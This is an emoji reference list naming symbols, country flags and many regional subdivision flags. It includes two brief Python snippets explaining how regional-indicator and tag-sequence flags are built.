📭 Open Mailbox With Lowered Flag
📮 Postbox
🗳 Ballot Box With Ballot
✏ Pencil
✒ Black Nib
🖋 Fountain Pen
🖊 Pen
🖌 Paintbrush
🖍 Crayon
📝 Memo
💼 Briefcase
📁 File Folder
📂 Open File Folder
🗂 Card Index Dividers
📅 Calendar
📆 Tear-Off Calendar
🗒 Spiral Notepad
🗓 Spiral Calendar
📇 Card Index
📈 Chart Increasing
📉 Chart Decreasing
📊 Bar Chart
📋 Clipboard
📌 Pushpin
📍 Round Pushpin
📎 Paperclip
🖇 Linked Paperclips
📏 Straight Ruler
📐 Triangular Ruler
✂ Scissors
🗃 Card File Box
🗄 File Cabinet
🗑 Wastebasket
🔒 Locked
🔓 Unlocked
🔏 Locked With Pen
🔐 Locked With Key
🔑 Key
🗝 Old Key
🔨 Hammer
⛏ Pick
⚒ Hammer and Pick
🛠 Hammer and Wrench
🗡 Dagger
⚔ Crossed Swords
🔫 Pistol
🏹 Bow and Arrow
🛡 Shield
🔧 Wrench
🔩 Nut and Bolt
⚙ Gear
🗜 Clamp
⚗ Alembic
⚖ Balance Scale
🔗 Link
⛓ Chains
💉 Syringe
💊 Pill
🚬 Cigarette
⚰ Coffin
⚱ Funeral Urn
🗿 Moai
🛢 Oil Drum
🔮 Crystal Ball
🛒 Shopping Cart
🏧 ATM Sign
🚮 Litter in Bin Sign
🚰 Potable Water
♿ Wheelchair Symbol
🚹 Men’s Room
🚺 Women’s Room
🚻 Restroom
🚼 Baby Symbol
🚾 Water Closet
🛂 Passport Control
🛃 Customs
🛄 Baggage Claim
🛅 Left Luggage
⚠ Warning
🚸 Children Crossing
⛔ No Entry
🚫 Prohibited
🚳 No Bicycles
🚭 No Smoking
🚯 No Littering
🚱 Non-Potable Water
🚷 No Pedestrians
📵 No Mobile Phones
🔞 No One Under Eighteen
☢ Radioactive
☣ Biohazard
⬆ Up Arrow
↗ Up-Right Arrow
➡ Right Arrow
↘ Down-Right Arrow
⬇ Down Arrow
↙ Down-Left Arrow
⬅ Left Arrow
↖ Up-Left Arrow
↕ Up-Down Arrow
↔ Left-Right Arrow
↩ Right Arrow Curving Left
↪ Left Arrow Curving Right
⤴ Right Arrow Curving Up
⤵ Right Arrow Curving Down
🔃 Clockwise Vertical Arrows
🔄 Anticlockwise Arrows Button
🔙 Back Arrow
🔚 End Arrow
🔛 On! Arrow
🔜 Soon Arrow
🔝 Top Arrow
🛐 Place of Worship
⚛ Atom Symbol
🕉 Om
✡ Star of David
☸ Wheel of Dharma
☯ Yin Yang
✝ Latin Cross
☦ Orthodox Cross
☪ Star and Crescent
☮ Peace Symbol
🕎 Menorah
🔯 Dotted Six-Pointed Star
♈ Aries
♉ Taurus
♊ Gemini
♋ Cancer
♌ Leo
♍ Virgo
♎ Libra
♏ Scorpius
♐ Sagittarius
♑ Capricorn
♒ Aquarius
♓ Pisces
⛎ Ophiuchus
🔀 Shuffle Tracks Button
🔁 Repeat Button
🔂 Repeat Single Button
▶ Play Button
⏩ Fast-Forward Button
⏭ Next Track Button
⏯ Play or Pause Button
◀ Reverse Button
⏪ Fast Reverse Button
⏮ Last Track Button
🔼 Up Button
⏫ Fast Up Button
🔽 Down Button
⏬ Fast Down Button
⏸ Pause Button
⏹ Stop Button
⏺ Record Button
⏏ Eject Button
🎦 Cinema
🔅 Dim Button
🔆 Bright Button
📶 Antenna Bars
📳 Vibration Mode
📴 Mobile Phone Off
♀ Female Sign
♂ Male Sign
⚕ Medical Symbol
♻ Recycling Symbol
⚜ Fleur-De-Lis
🔱 Trident Emblem
📛 Name Badge
🔰 Japanese Symbol for Beginner
⭕ Heavy Large Circle
✅ White Heavy Check Mark
☑ Ballot Box With Check
✔ Heavy Check Mark
✖ Heavy Multiplication X
❌ Cross Mark
❎ Cross Mark Button
➕ Heavy Plus Sign
➖ Heavy Minus Sign
➗ Heavy Division Sign
➰ Curly Loop
➿ Double Curly Loop
〽 Part Alternation Mark
✳ Eight-Spoked Asterisk
✴ Eight-Pointed Star
❇ Sparkle
‼ Double Exclamation Mark
⁉ Exclamation Question Mark
❓ Question Mark
❔ White Question Mark
❕ White Exclamation Mark
❗ Exclamation Mark
〰 Wavy Dash
© Copyright
® Registered
™ Trade Mark
#️⃣ Keycap Number Sign
*️⃣ Keycap Asterisk
0️⃣ Keycap Digit Zero
1️⃣ Keycap Digit One
2️⃣ Keycap Digit Two
3️⃣ Keycap Digit Three
4️⃣ Keycap Digit Four
5️⃣ Keycap Digit Five
6️⃣ Keycap Digit Six
7️⃣ Keycap Digit Seven
8️⃣ Keycap Digit Eight
9️⃣ Keycap Digit Nine
🔟 Keycap 10
💯 Hundred Points
🔠 Input Latin Uppercase
🔡 Input Latin Lowercase
🔢 Input Numbers
🔣 Input Symbols
🔤 Input Latin Letters
🅰 A Button (Blood Type)
🆎 AB Button (Blood Type)
🅱 B Button (Blood Type)
🆑 CL Button
🆒 Cool Button
🆓 Free Button
ℹ Information
🆔 ID Button
Ⓜ Circled M
🆕 New Button
🆖 NG Button
🅾 O Button (Blood Type)
🆗 OK Button
🅿 P Button
🆘 SOS Button
🆙 Up! Button
🆚 VS Button
🈁 Japanese “Here” Button
🈂 Japanese “Service Charge” Button
🈷 Japanese “Monthly Amount” Button
🈶 Japanese “Not Free of Charge” Button
🈯 Japanese “Reserved” Button
🉐 Japanese “Bargain” Button
🈹 Japanese “Discount” Button
🈚 Japanese “Free of Charge” Button
🈲 Japanese “Prohibited” Button
🉑 Japanese “Acceptable” Button
🈸 Japanese “Application” Button
🈴 Japanese “Passing Grade” Button
🈳 Japanese “Vacancy” Button
㊗ Japanese “Congratulations” Button
㊙ Japanese “Secret” Button
🈺 Japanese “Open for Business” Button
🈵 Japanese “No Vacancy” Button
▪ Black Small Square
▫ White Small Square
◻ White Medium Square
◼ Black Medium Square
◽ White Medium-Small Square
◾ Black Medium-Small Square
⬛ Black Large Square
⬜ White Large Square
🔶 Large Orange Diamond
🔷 Large Blue Diamond
🔸 Small Orange Diamond
🔹 Small Blue Diamond
🔺 Red Triangle Pointed Up
🔻 Red Triangle Pointed Down
💠 Diamond With a Dot
🔘 Radio Button
🔲 Black Square Button
🔳 White Square Button
⚪ White Circle
⚫ Black Circle
🔴 Red Circle
🔵 Blue Circle
🏁 Chequered Flag
🚩 Triangular Flag
🎌 Crossed Flags
🏴 Black Flag
🏳 White Flag
🏳️🌈 Rainbow Flag
🇦🇨 Ascension Island
🇦🇩 Andorra
🇦🇪 United Arab Emirates
🇦🇫 Afghanistan
🇦🇬 Antigua & Barbuda
🇦🇮 Anguilla
🇦🇱 Albania
🇦🇲 Armenia
🇦🇴 Angola
🇦🇶 Antarctica
🇦🇷 Argentina
🇦🇸 American Samoa
🇦🇹 Austria
🇦🇺 Australia
🇦🇼 Aruba
🇦🇽 Åland Islands
🇦🇿 Azerbaijan
🇧🇦 Bosnia & Herzegovina
🇧🇧 Barbados
🇧🇩 Bangladesh
🇧🇪 Belgium
🇧🇫 Burkina Faso
🇧🇬 Bulgaria
🇧🇭 Bahrain
🇧🇮 Burundi
🇧🇯 Benin
🇧🇱 St. Barthélemy
🇧🇲 Bermuda
🇧🇳 Brunei
🇧🇴 Bolivia
🇧🇶 Caribbean Netherlands
🇧🇷 Brazil
🇧🇸 Bahamas
🇧🇹 Bhutan
🇧🇻 Bouvet Island
🇧🇼 Botswana
🇧🇾 Belarus
🇧🇿 Belize
🇨🇦 Canada
🇨🇨 Cocos (Keeling) Islands
🇨🇩 Congo - Kinshasa
🇨🇫 Central African Republic
🇨🇬 Congo - Brazzaville
🇨🇭 Switzerland
🇨🇮 Côte d’Ivoire
🇨🇰 Cook Islands
🇨🇱 Chile
🇨🇲 Cameroon
🇨🇳 China
🇨🇴 Colombia
🇨🇵 Clipperton Island
🇨🇷 Costa Rica
🇨🇺 Cuba
🇨🇻 Cape Verde
🇨🇼 Curaçao
🇨🇽 Christmas Island
🇨🇾 Cyprus
🇨🇿 Czechia
🇩🇪 Germany
🇩🇬 Diego Garcia
🇩🇯 Djibouti
🇩🇰 Denmark
🇩🇲 Dominica
🇩🇴 Dominican Republic
🇩🇿 Algeria
🇪🇦 Ceuta & Melilla
🇪🇨 Ecuador
🇪🇪 Estonia
🇪🇬 Egypt
🇪🇭 Western Sahara
🇪🇷 Eritrea
🇪🇸 Spain
🇪🇹 Ethiopia
🇪🇺 European Union
🇫🇮 Finland
🇫🇯 Fiji
🇫🇰 Falkland Islands
🇫🇲 Micronesia
🇫🇴 Faroe Islands
🇫🇷 France
🇬🇦 Gabon
🇬🇧 United Kingdom
🇬🇩 Grenada
🇬🇪 Georgia
🇬🇫 French Guiana
🇬🇬 Guernsey
🇬🇭 Ghana
🇬🇮 Gibraltar
🇬🇱 Greenland
🇬🇲 Gambia
🇬🇳 Guinea
🇬🇵 Guadeloupe
🇬🇶 Equatorial Guinea
🇬🇷 Greece
🇬🇸 South Georgia & South Sandwich Islands
🇬🇹 Guatemala
🇬🇺 Guam
🇬🇼 Guinea-Bissau
🇬🇾 Guyana
🇭🇰 Hong Kong SAR China
🇭🇲 Heard & McDonald Islands
🇭🇳 Honduras
🇭🇷 Croatia
🇭🇹 Haiti
🇭🇺 Hungary
🇮🇨 Canary Islands
🇮🇩 Indonesia
🇮🇪 Ireland
🇮🇱 Israel
🇮🇲 Isle of Man
🇮🇳 India
🇮🇴 British Indian Ocean Territory
🇮🇶 Iraq
🇮🇷 Iran
🇮🇸 Iceland
🇮🇹 Italy
🇯🇪 Jersey
🇯🇲 Jamaica
🇯🇴 Jordan
🇯🇵 Japan
🇰🇪 Kenya
🇰🇬 Kyrgyzstan
🇰🇭 Cambodia
🇰🇮 Kiribati
🇰🇲 Comoros
🇰🇳 St. Kitts & Nevis
🇰🇵 North Korea
🇰🇷 South Korea
🇰🇼 Kuwait
🇰🇾 Cayman Islands
🇰🇿 Kazakhstan
🇱🇦 Laos
🇱🇧 Lebanon
🇱🇨 St. Lucia
🇱🇮 Liechtenstein
🇱🇰 Sri Lanka
🇱🇷 Liberia
🇱🇸 Lesotho
🇱🇹 Lithuania
🇱🇺 Luxembourg
🇱🇻 Latvia
🇱🇾 Libya
🇲🇦 Morocco
🇲🇨 Monaco
🇲🇩 Moldova
🇲🇪 Montenegro
🇲🇫 St. Martin
🇲🇬 Madagascar
🇲🇭 Marshall Islands
🇲🇰 Macedonia
🇲🇱 Mali
🇲🇲 Myanmar (Burma)
🇲🇳 Mongolia
🇲🇴 Macau SAR China
🇲🇵 Northern Mariana Islands
🇲🇶 Martinique
🇲🇷 Mauritania
🇲🇸 Montserrat
🇲🇹 Malta
🇲🇺 Mauritius
🇲🇻 Maldives
🇲🇼 Malawi
🇲🇽 Mexico
🇲🇾 Malaysia
🇲🇿 Mozambique
🇳🇦 Namibia
🇳🇨 New Caledonia
🇳🇪 Niger
🇳🇫 Norfolk Island
🇳🇬 Nigeria
🇳🇮 Nicaragua
🇳🇱 Netherlands
🇳🇴 Norway
🇳🇵 Nepal
🇳🇷 Nauru
🇳🇺 Niue
🇳🇿 New Zealand
🇴🇲 Oman
🇵🇦 Panama
🇵🇪 Peru
🇵🇫 French Polynesia
🇵🇬 Papua New Guinea
🇵🇭 Philippines
🇵🇰 Pakistan
🇵🇱 Poland
🇵🇲 St. Pierre & Miquelon
🇵🇳 Pitcairn Islands
🇵🇷 Puerto Rico
🇵🇸 Palestinian Territories
🇵🇹 Portugal
🇵🇼 Palau
🇵🇾 Paraguay
🇶🇦 Qatar
🇷🇪 Réunion
🇷🇴 Romania
🇷🇸 Serbia
🇷🇺 Russia
🇷🇼 Rwanda
🇸🇦 Saudi Arabia
🇸🇧 Solomon Islands
🇸🇨 Seychelles
🇸🇩 Sudan
🇸🇪 Sweden
🇸🇬 Singapore
🇸🇭 St. Helena
🇸🇮 Slovenia
🇸🇯 Svalbard & Jan Mayen
🇸🇰 Slovakia
🇸🇱 Sierra Leone
🇸🇲 San Marino
🇸🇳 Senegal
🇸🇴 Somalia
🇸🇷 Suriname
🇸🇸 South Sudan
🇸🇹 São Tomé & Príncipe
🇸🇻 El Salvador
🇸🇽 Sint Maarten
🇸🇾 Syria
🇸🇿 Swaziland
🇹🇦 Tristan da Cunha
🇹🇨 Turks & Caicos Islands
🇹🇩 Chad
🇹🇫 French Southern Territories
🇹🇬 Togo
🇹🇭 Thailand
🇹🇯 Tajikistan
🇹🇰 Tokelau
🇹🇱 Timor-Leste
🇹🇲 Turkmenistan
🇹🇳 Tunisia
🇹🇴 Tonga
🇹🇷 Turkey
🇹🇹 Trinidad & Tobago
🇹🇻 Tuvalu
🇹🇼 Taiwan
🇹🇿 Tanzania
🇺🇦 Ukraine
🇺🇬 Uganda
🇺🇲 U.S. Outlying Islands
🇺🇳 United Nations
🇺🇸 United States
🇺🇾 Uruguay
🇺🇿 Uzbekistan
🇻🇦 Vatican City
🇻🇨 St. Vincent & Grenadines
🇻🇪 Venezuela
🇻🇬 British Virgin Islands
🇻🇮 U.S. Virgin Islands
🇻🇳 Vietnam
🇻🇺 Vanuatu
🇼🇫 Wallis & Futuna
🇼🇸 Samoa
🇽🇰 Kosovo
🇾🇪 Yemen
🇾🇹 Mayotte
🇿🇦 South Africa
🇿🇲 Zambia
🇿🇼 Zimbabwe
🏴 Flag for England (GB-ENG)
🏴 Flag for Scotland (GB-SCT)
🏴 Flag for Wales (GB-WLS)
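The three subdivision flags above, like the many “Flag for …” rows further down, are emoji tag sequences: a waving black flag followed by invisible tag characters spelling a region code. Only England, Scotland, and Wales are RGI, which is why the other subdivision rows render here as a plain black flag. A minimal sketch in Python 3, assuming a font with tag-sequence support (the helper name subdivision_flag is illustrative, not part of any library):

# An emoji tag sequence is BLACK FLAG (U+1F3F4), then one tag character
# (U+E0020..U+E007E) per letter of the region code, then CANCEL TAG (U+E007F).
BLACK_FLAG = '\U0001F3F4'
CANCEL_TAG = '\U000E007F'

def subdivision_flag(code):
    """Build the tag sequence for a lowercase region code such as 'gbeng'."""
    tags = ''.join(chr(0xE0000 + ord(c)) for c in code.lower())
    return BLACK_FLAG + tags + CANCEL_TAG

print(subdivision_flag('gbsct'))  # Flag for Scotland (GB-SCT)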
🥆 Rifle
🤻 Modern Pentathlon
🏴☠️ Pirate Flag
🇦 Regional Indicator Symbol Letter A
🇧 Regional Indicator Symbol Letter B
🇨 Regional Indicator Symbol Letter C
🇩 Regional Indicator Symbol Letter D
🇪 Regional Indicator Symbol Letter E
🇫 Regional Indicator Symbol Letter F
🇬 Regional Indicator Symbol Letter G
🇭 Regional Indicator Symbol Letter H
🇮 Regional Indicator Symbol Letter I
🇯 Regional Indicator Symbol Letter J
🇰 Regional Indicator Symbol Letter K
🇱 Regional Indicator Symbol Letter L
🇲 Regional Indicator Symbol Letter M
🇳 Regional Indicator Symbol Letter N
🇴 Regional Indicator Symbol Letter O
🇵 Regional Indicator Symbol Letter P
🇶 Regional Indicator Symbol Letter Q
🇷 Regional Indicator Symbol Letter R
🇸 Regional Indicator Symbol Letter S
🇹 Regional Indicator Symbol Letter T
🇺 Regional Indicator Symbol Letter U
🇻 Regional Indicator Symbol Letter V
🇼 Regional Indicator Symbol Letter W
🇽 Regional Indicator Symbol Letter X
🇾 Regional Indicator Symbol Letter Y
🇿 Regional Indicator Symbol Letter Z
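Country flags, by contrast, are pairs of the regional indicator symbols listed above, matching the country's ISO 3166-1 alpha-2 code. A minimal sketch in plain Python 3 (the helper name flag is illustrative):

# Regional indicator symbols fill U+1F1E6..U+1F1FF, one per letter A-Z;
# two of them in sequence render as the corresponding country flag.
REGIONAL_INDICATOR_A = 0x1F1E6

def flag(alpha2):
    """Map an ISO 3166-1 alpha-2 code such as 'AD' to its flag emoji."""
    return ''.join(chr(REGIONAL_INDICATOR_A + ord(c) - ord('A'))
                   for c in alpha2.upper())

print(flag('AD'))  # 🇦🇩 Andorra
print(flag('EU'))  # 🇪🇺 European Union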
🐱🐉 Dino Cat
🐱🚀 Astro Cat
🐱👤 Ninja Cat
🐱💻 Hacker Cat
🐱🏍 Stunt Cat
🐱👓 Hipster Cat
◯◯◯◯◯ Olympic Rings
🏴 Flag for Baiti (NR-05)
🏴 Flag for Nord-Trøndelag (NO-17)
🏴 Flag for Hordaland (NO-12)
🏴 Flag for Akershus (NO-02)
🏴 Flag for Sør-Trøndelag (NO-16)
🏴 Flag for Telemark (NO-08)
🏴 Flag for Utrecht (NL-UT)
🏴 Flag for Møre og Romsdal (NO-15)
🏴 Flag for Svalbard (NO-21)
🏴 Flag for Purwanchal (NP-4)
🏴 Flag for Central (NP-1)
🏴 Flag for Oslo (NO-03)
🏴 Flag for Boe (NR-06)
👨🏾👨🏾👦🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for North Brabant (NL-NB)
🏴 Flag for Aust-Agder (NO-09)
🏴 Flag for Anabar (NR-02)
🏴 Flag for Limburg (NL-LI)
🏴 Flag for Buskerud (NO-06)
🏴 Flag for Hedmark (NO-04)
🏴 Flag for Vestfold (NO-07)
🏴 Flag for Anibare (NR-04)
🏴 Flag for Finnmark (NO-20)
🏴 Flag for Overijssel (NL-OV)
🏴 Flag for Rogaland (NO-11)
🏴 Flag for Østfold (NO-01)
🏴 Flag for Aiwo (NR-01)
🏴 Flag for Zeeland (NL-ZE)
🏴 Flag for Buada (NR-07)
🏴 Flag for Troms (NO-19)
🏴 Flag for Oppland (NO-05)
🏴 Flag for Madhya Pashchimanchal (NP-2)
🏴 Flag for Anetan (NR-03)
🏴 Flag for Western (NP-3)
🏴 Flag for Jan Mayen (NO-22)
🏴 Flag for Nordland (NO-18)
🏴 Flag for Bocas del Toro (PA-1)
🏴 Flag for Colón (PA-3)
🏴 Flag for Ad Dakhiliyah (OM-DA)
🏴 Flag for Muscat (OM-MA)
🏴 Flag for Ewa (NR-09)
🏴 Flag for Taranaki (NZ-TKI)
🏴 Flag for Ijuw (NR-10)
🏴 Flag for West Coast (NZ-WTC)
🏴 Flag for Southland (NZ-STL)
🏴 Flag for Tasman (NZ-TAS)
🏴 Flag for Manawatu-Wanganui (NZ-MWT)
🏴 Flag for Waikato (NZ-WKO)
🏴 Flag for Marlborough (NZ-MBH)
🏴 Flag for Bay of Plenty (NZ-BOP)
🏴 Flag for Nibok (NR-12)
🏴 Flag for Al Buraimi (OM-BU)
🏴 Flag for Auckland (NZ-AUK)
🏴 Flag for Janub ash Sharqiyah (OM-SJ)
🏴 Flag for Shamal ash Sharqiyah (OM-SS)
🏴 Flag for Coclé (PA-2)
🏴 Flag for Meneng (NR-11)
🏴 Flag for West Panamá (PA-10)
🏴 Flag for Ad Dhahirah (OM-ZA)
🏴 Flag for Northland (NZ-NTL)
🏴 Flag for Canterbury (NZ-CAN)
🏴 Flag for Gisborne (NZ-GIS)
🏴 Flag for Chatham Islands (NZ-CIT)
🏴 Flag for Uaboe (NR-13)
🏴 Flag for Denigomodu (NR-08)
🏴 Flag for Musandam (OM-MU)
🏴 Flag for Shamal al Batinah (OM-BS)
🏴 Flag for Hawke’s Bay (NZ-HKB)
🏴 Flag for Otago (NZ-OTA)
🏴 Flag for Janub al Batinah (OM-BJ)
🏴 Flag for Dhofar (OM-ZU)
🏴 Flag for Darién (PA-5)
🏴 Flag for El Callao (PE-CAL)
🏴 Flag for Herrera (PA-6)
🏴 Flag for Guna Yala (PA-KY)
🏴 Flag for Emberá (PA-EM)
🏴 Flag for La Libertad (PE-LAL)
🏴 Flag for Veraguas (PA-9)
🏴 Flag for Loreto (PE-LOR)
🏴 Flag for Amazonas (PE-AMA)
🏴 Flag for Chiriquí (PA-4)
🏴 Flag for Chimbu (PG-CPK)
🏴 Flag for Eastern Highlands (PG-EHG)
🏴 Flag for San Martín (PE-SAM)
🏴 Flag for Junín (PE-JUN)
🏴 Flag for Huánuco (PE-HUC)
🏴 Flag for Pasco (PE-PAS)
🏴 Flag for Ngöbe-Buglé (PA-NB)
🏴 Flag for Cajamarca (PE-CAJ)
🏴 Flag for Ica (PE-ICA)
🏴 Flag for Lima Region (PE-LIM)
🏴 Flag for Moquegua (PE-MOQ)
🏴 Flag for Puno (PE-PUN)
🏴 Flag for Ucayali (PE-UCA)
🏴 Flag for Lima (PE-LMA)
🏴 Flag for Piura (PE-PIU)
🏴 Flag for Tumbes (PE-TUM)
🏴 Flag for Cusco (PE-CUS)
🏴 Flag for Panamá (PA-8)
🏴 Flag for Tacna (PE-TAC)
🏴 Flag for Central (PG-CPM)
🏴 Flag for Los Santos (PA-7)
🏴 Flag for Lambayeque (PE-LAM)
🏴 Flag for Huancavelica (PE-HUV)
🏴 Flag for Ancash (PE-ANC)
🏴 Flag for Hela (PG-HLA)
🏴 Flag for Port Moresby (PG-NCD)
🏴 Flag for Islamabad (PK-IS)
🏴 Flag for Metro Manila (PH-00)
🏴 Flag for Bicol (PH-05)
🏴 Flag for Gulf (PG-GPK)
🏴 Flag for Zamboanga Peninsula (PH-09)
🏴 Flag for Bougainville (PG-NSB)
🏴 Flag for Gilgit-Baltistan (PK-GB)
🏴 Flag for Madang (PG-MPM)
🏴 Flag for Western (FJ-W)
🏴 Flag for Soccsksargen (PH-12)
🏴 Flag for Eastern Visayas (PH-08)
🏴 Flag for Enga (PG-EPW)
🏴 Flag for Milne Bay (PG-MBA)
🏴 Flag for Calabarzon (PH-40)
🏴 Flag for Jiwaka (PG-JWK)
🏴 Flag for Cagayan Valley (PH-02)
👨🏿👨🏿👦🏿👧🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Morobe (PG-MPL)
🏴 Flag for Northern Mindanao (PH-10)
🏴 Flag for Mimaropa (PH-41)
🏴 Flag for Balochistan (PK-BA)
🏴 Flag for Caraga (PH-13)
🏴 Flag for East Sepik (PG-ESW)
🏴 Flag for Western Visayas (PH-06)
🏴 Flag for Central Luzon (PH-03)
🏴 Flag for Muslim Mindanao (PH-14)
🏴 Flag for Southern Highlands (PG-SHM)
🏴 Flag for Western (PG-WPD)
🏴 Flag for Sandaun (PG-SAN)
🏴 Flag for New Ireland (PG-NIK)
🏴 Flag for Oro (PG-NPP)
🏴 Flag for Manus (PG-MRL)
🏴 Flag for Western Highlands (PG-WHM)
🏴 Flag for Davao (PH-11)
🏴 Flag for Punjab (PK-PB)
🏴 Flag for Pomerania (PL-PM)
🏴 Flag for Silesia (PL-SL)
🏴 Flag for Kuyavian-Pomerania (PL-KP)
🏴 Flag for Tubas (PS-TBS)
🏴 Flag for Ramallah and al-Bireh (PS-RBH)
🏴 Flag for Gaza (PS-GZA)
🏴 Flag for Rafah (PS-RFH)
🏴 Flag for Hebron (PS-HBN)
🏴 Flag for Podlaskie (PL-PD)
🏴 Flag for Subcarpathia (PL-PK)
🏴 Flag for Jenin (PS-JEN)
🏴 Flag for Lower Silesian (PL-DS)
🏴 Flag for Khan Yunis (PS-KYS)
🏴 Flag for Łódź (PL-LD)
🏴 Flag for North Gaza (PS-NGZ)
🏴 Flag for West Pomerania (PL-ZP)
🏴 Flag for Azad Kashmir (PK-JK)
🏴 Flag for Salfit (PS-SLT)
🏴 Flag for Mazovia (PL-MZ)
🏴 Flag for Lesser Poland (PL-MA)
🏴 Flag for Qalqilya (PS-QQA)
🏴 Flag for Aveiro (PT-01)
🏴 Flag for Greater Poland (PL-WP)
🏴 Flag for Opole (PL-OP)
🏴 Flag for Bethlehem (PS-BTH)
🏴 Flag for Khyber Pakhtunkhwa (PK-KP)
🏴 Flag for Tulkarm (PS-TKM)
🏴 Flag for Nablus (PS-NBS)
🏴 Flag for Warmian-Masuria (PL-WN)
🏴 Flag for Jericho (PS-JRH)
🏴 Flag for Sindh (PK-SD)
🏴 Flag for Lublin (PL-LU)
🏴 Flag for Jerusalem (PS-JEM)
🏴 Flag for Lubusz (PL-LB)
🏴 Flag for Świętokrzyskie (PL-SK)
🏴 Flag for Melekeok (PW-212)
🏴 Flag for Faro (PT-08)
🏴 Flag for Central (PY-11)
🏴 Flag for Évora (PT-07)
🏴 Flag for Ngiwal (PW-228)
🏴 Flag for Ñeembucú (PY-12)
🏴 Flag for Viana do Castelo (PT-16)
🏴 Flag for Lisbon (PT-11)
🏴 Flag for Presidente Hayes (PY-15)
🏴 Flag for Vila Real (PT-17)
🏴 Flag for Viseu (PT-18)
🏴 Flag for Airai (PW-004)
🏴 Flag for Amambay (PY-13)
🏴 Flag for Ngatpang (PW-224)
🏴 Flag for Coimbra (PT-06)
🏴 Flag for Portalegre (PT-12)
🏴 Flag for Peleliu (PW-350)
🏴 Flag for Ngardmau (PW-222)
🏴 Flag for Ngaraard (PW-214)
🏴 Flag for Canindeyú (PY-14)
🏴 Flag for Angaur (PW-010)
🏴 Flag for Sonsorol (PW-370)
🏴 Flag for Bragança (PT-04)
🏴 Flag for Castelo Branco (PT-05)
🏴 Flag for Santarém (PT-14)
🏴 Flag for Braga (PT-03)
🏴 Flag for Hatohobei (PW-050)
🏴 Flag for Koror (PW-150)
🏴 Flag for Alto Paraná (PY-10)
🏴 Flag for Ngeremlengui (PW-227)
🏴 Flag for Leiria (PT-10)
🏴 Flag for Porto (PT-13)
🏴 Flag for Setúbal (PT-15)
🏴 Flag for Aimeliik (PW-002)
🏴 Flag for Ngchesar (PW-226)
🏴 Flag for Guarda (PT-09)
🏴 Flag for San Pedro (PY-2)
🏴 Flag for Caaguazú (PY-5)
🏴 Flag for Guairá (PY-4)
🏴 Flag for Bacău (RO-BC)
🏴 Flag for Itapúa (PY-7)
🏴 Flag for Caraș-Severin (RO-CS)
🏴 Flag for Caazapá (PY-6)
🏴 Flag for Al Khor (QA-KH)
🏴 Flag for Covasna (RO-CV)
🏴 Flag for Alba (RO-AB)
🏴 Flag for Doha (QA-DA)
🏴 Flag for Dolj (RO-DJ)
🏴 Flag for Cordillera (PY-3)
🏴 Flag for Madinat ash Shamal (QA-MS)
🏴 Flag for Bihor (RO-BH)
🏴 Flag for Harghita (RO-HR)
🏴 Flag for Brăila (RO-BR)
🏴 Flag for Argeș (RO-AG)
🏴 Flag for Al Daayen (QA-ZA)
🏴 Flag for Bistriţa-Năsăud (RO-BN)
🏴 Flag for Călărași (RO-CL)
🏴 Flag for Asunción (PY-ASU)
🏴 Flag for Concepción (PY-1)
🏴 Flag for Botoşani (RO-BT)
🏴 Flag for Galați (RO-GL)
🏴 Flag for Giurgiu (RO-GR)
🏴 Flag for Boquerón (PY-19)
🏴 Flag for Misiones (PY-8)
🏴 Flag for Bucharest (RO-B)
🏴 Flag for Paraguarí (PY-9)
🏴 Flag for Al Rayyan (QA-RA)
🏴 Flag for Constanța (RO-CT)
🏴 Flag for Hunedoara (RO-HD)
🏴 Flag for Dâmbovița (RO-DB)
🏴 Flag for Arad (RO-AR)
🏴 Flag for Cluj (RO-CJ)
🏴 Flag for Buzău (RO-BZ)
🏴 Flag for Al Wakrah (QA-WA)
🏴 Flag for Vâlcea (RO-VL)
🏴 Flag for Iași (RO-IS)
🏴 Flag for Mehedinți (RO-MH)
🏴 Flag for Kosovo-Metohija (RS-KM)
🏴 Flag for Ialomița (RO-IL)
🏴 Flag for Teleorman (RO-TR)
🏴 Flag for Šumadija (RS-12)
🏴 Flag for Nišava (RS-20)
🏴 Flag for Altai (RU-AL)
🏴 Flag for Vrancea (RO-VN)
🏴 Flag for Vaslui (RO-VS)
🏴 Flag for Ilfov (RO-IF)
🏴 Flag for Mačva (RS-08)
🏴 Flag for Kolubara (RS-09)
🏴 Flag for Prahova (RO-PH)
🏴 Flag for Braničevo (RS-11)
🏴 Flag for Beograd (RS-00)
🏴 Flag for Zaječar (RS-15)
🏴 Flag for Moravica (RS-17)
🏴 Flag for Pomoravlje (RS-13)
🏴 Flag for Olt (RO-OT)
🏴 Flag for Satu Mare (RO-SM)
🏴 Flag for Toplica (RS-21)
🏴 Flag for Sălaj (RO-SJ)
🏴 Flag for Mureş (RO-MS)
🏴 Flag for Pirot (RS-22)
🏴 Flag for Rasina (RS-19)
🏴 Flag for Pčinja (RS-24)
🏴 Flag for Maramureş (RO-MM)
🏴 Flag for Suceava (RO-SV)
🏴 Flag for Raška (RS-18)
🏴 Flag for Bor (RS-14)
🏴 Flag for Podunavlje (RS-10)
🏴 Flag for Neamţ (RO-NT)
🏴 Flag for Zlatibor (RS-16)
🏴 Flag for Vojvodina (RS-VO)
🏴 Flag for Jablanica (RS-23)
🏴 Flag for Tulcea (RO-TL)
🏴 Flag for Adygea (RU-AD)
🏴 Flag for Timiș (RO-TM)
👩🏼👦🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Karachay-Cherkess (RU-KC)
🏴 Flag for Khakassia (RU-KK)
🏴 Flag for Buryat (RU-BU)
🏴 Flag for Kalmykia (RU-KL)
🏴 Flag for Belgorod (RU-BEL)
🏴 Flag for Khanty-Mansi (RU-KHM)
🏴 Flag for Leningrad (RU-LEN)
🏴 Flag for Kurgan (RU-KGN)
🏴 Flag for Ivanovo (RU-IVA)
🏴 Flag for Ingushetia (RU-IN)
🏴 Flag for Kirov (RU-KIR)
🏴 Flag for Krasnodar Krai (RU-KDA)
🏴 Flag for Karelia (RU-KR)
🏴 Flag for Magadan (RU-MAG)
🏴 Flag for Krasnoyarsk Krai (RU-KYA)
🏴 Flag for Kemerovo (RU-KEM)
🏴 Flag for Astrakhan (RU-AST)
🏴 Flag for Amur (RU-AMU)
🏴 Flag for Mordovia (RU-MO)
🏴 Flag for Komi (RU-KO)
🏴 Flag for Chelyabinsk (RU-CHE)
🏴 Flag for Khabarovsk Krai (RU-KHA)
🏴 Flag for Kursk (RU-KRS)
